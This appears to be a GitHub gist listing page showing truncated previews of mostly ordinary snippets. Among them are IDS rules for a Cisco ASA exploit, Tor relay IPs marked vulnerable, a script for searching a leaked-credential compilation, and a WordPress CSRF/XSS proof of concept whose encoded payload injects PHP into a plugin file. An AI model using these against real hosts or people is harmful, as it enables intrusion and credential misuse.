Skip to content

Instantly share code, notes, and snippets.

View hktalent's full-sized avatar
💭
☕️0dat RCE for everything's

51pwn hktalent

💭
☕️0dat RCE for everything's
1.2k followers · 1.1k following
View GitHub Profile
@fox-srt
fox-srt / CVE-2018-0101.rules
Last active April 10, 2018 09:42
Cisco ASA RCE / CVE-2018-0101 IDS Signatures
# IDS signatures for https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180129-asa1:
alert udp any any -> any 500 (msg:"FOX-SRT - Suspicious - Possible Fragmented Cisco IKE/isakmp Packet HeapSpray (CVE-2018-0101)"; flow:to_server; content:"|84|"; offset:16; depth:1; content:"|02|"; distance:1; within:1; fast_pattern; byte_test:4,>,5000,5,relative; byte_test:2,>,5000,11,relative; byte_extract:4,36,fragment_match; byte_test:4,=,fragment_match,53,relative; byte_test:4,=,fragment_match,137,relative; byte_test:4,=,fragment_match,237,relative; threshold:type limit, track by_dst, count 1, seconds 600; classtype:attempted-admin; sid:21002339; rev:5;)
alert udp any any -> any 500 (msg:"FOX-SRT - Exploit - Possible Shellcode in Cisco IKE/isakmp - tcp/CONNECT/"; content:"tcp/CONNECT/"; fast_pattern:only; threshold:type limit, track by_src, count 1, seconds 600; priority:1; classtype:attempted-admin; sid:21002340; rev:2;)
@gkbrk
gkbrk / scanner.py
Created March 10, 2015 21:11
Simple port scanner in Python.
import socket
import sys
import threading
import queue
import time
common_ports = {
"21": "FTP",
"22": "SSH",
"23": "Telnet",
@unkaktus
unkaktus / grill-tor-2016-12-08
Last active August 8, 2018 00:34
Tor grill scan results
185.13.39.197:443,001524DD403D729F08F7E5D77813EF12756CFA8D,Tor 0.2.8.10 on Linux,100,6.295928ms,vulnerable
158.58.170.220:22,00459AF0E9DED00E54A48B268126679F578F695A,Tor 0.2.8.10 on Linux,500,6.966079ms,sysctl workaround/fixed kernel
178.142.72.77:9001,0041E0150B0A307506C2863EFC9F2B7E3A523B36,Tor 0.2.6.10 on Linux,250,38.912133ms,many challenge ACKs
208.36.2.3:443,0063D0DE32C80691A0AC1A968A8CCF5ABA420E29,Tor 0.2.7.5 on Linux,100,40.981045ms,vulnerable
162.247.72.201:443,0011BD2485AD45D984EC4159C88FC066E5E3300E,Tor 0.2.8.6 on Linux,100,24.729026ms,vulnerable
88.99.35.166:443,001093204F7CE204E050790879974DBDC0D38911,Tor 0.2.5.12 on Linux,500,14.564313ms,sysctl workaround/fixed kernel
198.50.159.155:443,006CC1DD17754582618DE2539DAAFE0A96962583,Tor 0.2.8.9 on Linux,500,5.551323ms,sysctl workaround/fixed kernel
138.197.143.132:9001,001C3023B5F7714B93801518624239EB07A53BEA,Tor 0.2.8.9 on Linux,1,25.523848ms,one challenge ACK
46.4.253.194:443,002121252467538C9DA1BC2378997E64629814F6,Tor 0.2.7.6 on Linux,100,18.65576
@poisa
poisa / query.sh
Created December 18, 2017 22:25
Query script for the BreachCompilation updated to work in OSX
#!/bin/sh
dir=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )
if [ "$1" != "" ]; then
letter1=$(echo "$1" | tr '[:upper:]' '[:lower:]' | cut -b1)
if [[ $letter1 == [a-zA-Z0-9] ]]; then
if [ -f "$dir/data/$letter1" ]; then
grep -ai "^$1" "$dir/data/$letter1"
else
letter2=$(echo "$1" | tr '[:upper:]' '[:lower:]' | cut -b2)
@adammw
adammw / socks.js
Created February 14, 2012 16:21
Socks library snippet for Node.js
var net = require('net'),
util = require('util'),
EventEmitter = require('events').EventEmitter;
var SOCKSClient = module.exports = function() {
var args = normalizeConnectArgs(arguments);
this.state = 'connecting';
this.socket = net.connect(args[0].port, args[0].host, onConnect.bind(this));
this.socket.on('data', onData.bind(this));
this.socket.on('end', onEnd.bind(this));
@allyshka
allyshka / csrf.html
Last active April 28, 2019 05:57
Wordpress <=5.1 PoC Akismet plugin index.php edit through CSRF
<html>
<body>
<form action="http://wpxss.vh/wp-comments-post.php" method="POST">
<input type="text" name="comment" value="&lt;a title=&apos;xss&quot; style=left:0;top:0;position:fixed;display:block;width:1000%;height:1000% onmousemove=eval(atob(&quot;dmFyIGV4cGxvaXQ9ZnVuY3Rpb24oKXt2YXIgbz0iIjtjb25zb2xlLmxvZygiR2V0IG5vbmNlIHRva2VuLiIpLGpRdWVyeS5nZXQoIi93cC1hZG1pbi9wbHVnaW4tZWRpdG9yLnBocD9wbHVnaW49YWtpc21ldC9pbmRleC5waHAmU3VibWl0PVNlbGVjdCIsZnVuY3Rpb24oZSl7aWYobz1qUXVlcnkoZSkuZmluZCgiI3RlbXBsYXRlICNub25jZSIpLnZhbCgpKXtjb25zb2xlLmxvZygiU3VjY2VzcyEgbm9uY2U6ICIrbyk7dmFyIG49e25vbmNlOm8sbmV3Y29udGVudDoiPD9waHAgcGhwaW5mbygpOy8qIixhY3Rpb246ImVkaXQtdGhlbWUtcGx1Z2luLWZpbGUiLGZpbGU6ImFraXNtZXQvaW5kZXgucGhwIixwbHVnaW46ImFraXNtZXQvYWtpc21ldC5waHAiLCJkb2NzLWxpc3QiOiIifTtjb25zb2xlLmxvZygiQWRkIFBIUCBjb2RlIHRvIHBsdWdpbiBmaWxlLiIpLGpRdWVyeS5wb3N0KCIvd3AtYWRtaW4vYWRtaW4tYWpheC5waHAiLG4sZnVuY3Rpb24oZSl7Y29uc29sZS5sb2coIlN1Y2Nlc3MhIiksd2luZG93Lm9wZW4oIi93cC1jb250ZW50L3BsdWdpbnMvYWtpc21ldC8iKX0pfX0pfSxoPWRvY3VtZW50Lmdld
@chrisforbes
chrisforbes / bot.py
Created August 29, 2011 03:44
Really simple IRC bot using Twisted
#!/usr/bin/env python2
"""A really simple IRC bot."""
import sys
from twisted.internet import reactor, protocol
from twisted.words.protocols import irc
class Bot(irc.IRCClient):
def _get_nickname(self):
@noahlz
noahlz / troubleshooting-with-jcmd.md
Last active May 31, 2019 13:47
Troubleshooting Production JVMs with jcmd

Troubleshooting Production JVMs with jcmd

jcmd is a powerful new tool introduced in Java 7. Along with jstack and jps, it should be in your go-to tool for solving production problems on the JVM. (Come to think of it, with this tool you don't really need jps anymore)

Here's an example session with jcmd:

$ ssh wopr.qa.corp.local
$ jcmd -l
34739 sun.tools.jcmd.JCmd -l
@spicycode
spicycode / GIF-Screencast-OSX.md
Last active June 10, 2019 21:16 — forked from dergachev/GIF-Screencast-OSX.md
OS X Screencast to animated GIF

OS X Screencast to animated GIF

This gist shows how to create a GIF screencast using only free OS X tools: QuickTime, ffmpeg, and gifsicle.

Screencapture GIF

Instructions

To capture the video (filesize: 19MB), using the free "QuickTime Player" application:

@XueshiQiao
XueshiQiao / gource.sh
Last active November 10, 2019 15:56 — forked from cgoldberg/gource.sh
Generate a MP4 Video for your Git project commits using Gource!
# 1.install gource using HomeBrew
$ brew install gource
# 2.install avconv
git clone git://git.libav.org/libav.git
cd libav
# it will take 3-5 minutes to complie, be patient.
./configure --disable-yasm
make && make install